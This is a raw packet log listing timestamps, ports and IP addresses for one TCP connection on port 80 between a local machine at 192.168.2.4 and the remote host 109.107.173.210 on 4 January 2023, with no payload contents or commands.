Jan 4, 2023 16:47:23.972816944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972837925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972850084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972868919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972882986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972904921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972918034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972939014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972951889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972968102 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972984076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.973000050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.973033905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999068975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999167919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999217987 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999264002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999310970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999337912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999357939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999404907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999408007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999440908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999454021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999484062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999502897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999522924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999551058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999577045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999598026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999608994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999645948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999653101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999691963 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999701977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999738932 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999751091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999789953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999803066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999836922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999862909 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999886036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999895096 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999938011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.999959946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.999994040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000001907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000049114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000066996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000101089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000112057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000149012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000157118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000201941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000211000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000252008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000286102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000318050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000365019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000374079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000416040 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000428915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000471115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000473022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000528097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000535965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000575066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000588894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000619888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000637054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000665903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000684023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000724077 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000726938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000773907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000801086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000825882 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000868082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000879049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000914097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000931978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.000941038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.000982046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001017094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001032114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001051903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001080990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001082897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001127958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001127958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001176119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001176119 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001224041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001228094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001272917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001281023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001322031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001332998 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001379967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001400948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001429081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001437902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001482010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001493931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001517057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001530886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001539946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001578093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001597881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001616955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001645088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001646996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001693964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001693964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001743078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001744986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001791000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001796007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001841068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001842022 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001868963 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001893044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001926899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.001931906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001981020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.001986027 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002027035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002036095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002074957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002082109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002127886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002136946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002185106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002186060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002233982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002245903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002284050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002289057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002330065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002331972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002377987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002388954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002434969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002439022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002482891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002485037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002530098 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002536058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002577066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002580881 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002625942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002626896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002654076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002672911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002717018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002754927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002800941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002816916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002847910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002852917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002896070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002898932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002945900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.002954006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.002993107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003002882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003040075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003046036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003092051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003103018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003139019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003154039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003185987 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003192902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003232956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003237009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003281116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003289938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003343105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003369093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003391027 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003395081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003437996 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003449917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003490925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003501892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003526926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003547907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003573895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003585100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003629923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003631115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003650904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003680944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003698111 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003743887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003746986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003762007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003789902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003824949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003837109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003839016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003890038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003899097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.003948927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.003950119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.004002094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.004024029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.004050016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.004062891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.004096985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.004126072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.004144907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.004152060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.004192114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.004195929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.004252911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.004260063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.004303932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.030224085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030296087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030347109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030404091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030426979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030476093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030536890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030584097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.030586958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030631065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.030637980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030675888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.030719042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030736923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.030766010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030810118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.030816078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030838966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.030864954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030877113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.030921936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030925035 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.030942917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.030977964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.030993938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031009912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031044006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031065941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031090021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031109095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031141043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031152010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031188011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031204939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031244993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031250000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031296968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031310081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031344891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031358004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031394005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031414032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031440973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031455040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031490088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031503916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031537056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031549931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031584978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031598091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031632900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031646967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031678915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031692982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031725883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031738043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031771898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031785011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031819105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031831026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031867027 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031881094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031914949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031925917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.031965971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.031971931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032012939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032022953 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032061100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032072067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032110929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032121897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032156944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032167912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032202959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032215118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032249928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032259941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032296896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032308102 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032346010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032356024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032421112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032433033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032468081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032479048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032514095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032526970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032561064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032573938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032608032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032618046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032655001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032666922 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032701969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032712936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032748938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032761097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032794952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032808065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032843113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032855988 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032890081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032902956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032938004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.032947063 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.032987118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033013105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033016920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033061981 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033073902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033099890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033135891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033135891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033183098 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033196926 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033251047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033262014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033279896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033308983 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033325911 CET	80	49695	109.107.173.210	192.168.2.4
